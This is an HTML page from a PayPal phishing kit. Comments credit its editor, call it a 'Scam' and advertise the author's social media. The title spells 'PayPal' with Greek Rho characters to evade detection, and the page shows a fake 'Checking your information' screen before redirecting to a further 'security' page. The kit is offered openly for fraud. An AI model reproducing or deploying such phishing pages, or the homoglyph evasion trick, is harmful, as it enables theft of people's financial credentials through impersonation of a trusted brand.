<!-- 
Hi guys this Scam is Edited by RooT-MrX

You need to Change page Login because it's Very Old! (2015)
So work Hard and Good luck my Brother!

Wait for my Personal Scam... Coming soon inchaaLah [Smart,Full inFo,Speed,Work in All Device,New Style 2016] ^_^ 
___________________________________________
Follows us :

FaceBook         #==>   Fb.com/root0blog
YouTube          #==>   Bit.do/caheA
Twitter          #==>   Twitter.com/mrxroot
Google Plus      #==>   Bit.do/caheL
web site         #==>   RooT-Mrx.blogspot.com
-->
<html>
<head>
<title>Logging in - &Rho;ay&Rho;al</title>
<link rel="stylesheet" href="./css/hiho.css">
</head>
<body>

<div class="loading">
<h3 style="text-align: center; margin-bottom: 40px;"> Checking your information ...</h3>
<div id="jsbksbvdsksdbksadj" class="jfjgfdhdhtjdhtdh" style="margin: 0 auto;"></div>
<p style="text-align: center; margin-top: 40px; font-size: 16px; color: #656565;">will go to another page after a few seconds ...
<meta http-equiv="refresh" content="3;url=security.html">
</div>
</body>
</html>
<!-- 
Hi guys this Scam is Edited by RooT-MrX

You need to Change page Login because it's Very Old! (2015)
So work Hard and Good luck my Brother!

Wait for my Personal Scam... Coming soon inchaaLah [Smart,Full inFo,Speed,Work in All Device,New Style 2016] ^_^ 
___________________________________________
Follows us :

FaceBook         #==>   Fb.com/root0blog
YouTube          #==>   Bit.do/caheA
Twitter          #==>   Twitter.com/mrxroot
Google Plus      #==>   Bit.do/caheL
web site         #==>   RooT-Mrx.blogspot.com
-->